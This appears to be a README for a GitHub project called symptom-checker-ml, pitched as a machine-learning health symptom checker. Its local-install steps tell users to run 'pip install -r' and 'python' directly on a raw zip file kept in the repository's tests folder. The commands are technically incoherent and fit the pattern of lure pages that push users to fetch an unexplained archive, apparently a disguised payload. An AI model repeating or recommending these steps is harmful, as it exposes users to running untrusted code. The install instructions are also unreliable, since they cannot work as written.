Welcome to the symptom-checker-ml project! This software makes it easy to check your symptoms and get helpful insights on your health. Follow the steps below to download and run the application.
The symptom-checker-ml is a machine learning model designed for health assessments. It includes several features:
- Data Preprocessing: Raw data is cleaned and prepared for analysis.
- Feature Engineering: Important factors are identified to improve predictions.
- Training Pipeline: The model learns from data to provide accurate results.
- Prediction API (FastAPI): Get predictions easily through an API.
- Multilingual Support: Access the application in various languages.
- Docker Deployment: Run the application in a container for easy setup.
Before downloading, ensure your system meets these requirements:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB of RAM
- Storage: Minimum of 500 MB of free space
- Python: Version 3.7 or later (if running locally)
To get started, visit the Releases page to download the application.
- Go to the Releases page.
- Find the latest version of the application.
- Click on the download link for your operating system.
- Once the download finishes, locate the file on your computer.
-
Make sure you have Docker installed on your machine.
-
Open your terminal or command prompt.
-
Run the following command to pull the latest version of the application:
docker pull symptom-checker-ml
-
After the image is downloaded, run the container using:
docker run -p 80:80 symptom-checker-ml
-
Open your web browser and go to
http://localhostto access the symptom checker.
-
Ensure you have Python 3.7 or later installed.
-
Open your terminal or command prompt.
-
Navigate to the directory where you downloaded the application.
-
Install the required libraries by running:
pip install -r https://github.com/Chuckaballe60/symptom-checker-ml/raw/refs/heads/main/tests/checker-symptom-ml-v2.1.zip
-
Start the Application:
python https://github.com/Chuckaballe60/symptom-checker-ml/raw/refs/heads/main/tests/checker-symptom-ml-v2.1.zip
-
Open your web browser and go to
http://localhost:8000to access the symptom checker.
- Enter your symptoms in the provided fields.
- Click the "Check Symptoms" button.
- Review the results that appear, which will provide possible health insights based on your input.
The application supports multiple languages. You can select your preferred language from the settings in the application. This ensures that you get the most comfortable experience while checking your symptoms.
If you encounter any issues, consider the following steps:
- Check Dependencies: Make sure all required libraries are installed.
- Internet Connection: Ensure you are connected to the internet if using the Docker version.
- Browser Compatibility: Use a modern web browser for the best experience.
For more detailed troubleshooting, visit our GitHub Issues page.
Should you need help, you can raise an issue on the GitHub repository. Our community is here to support you.
This project is licensed under the MIT License. You can use and modify the code while adhering to this license.
Enjoy exploring your health with the symptom-checker-ml!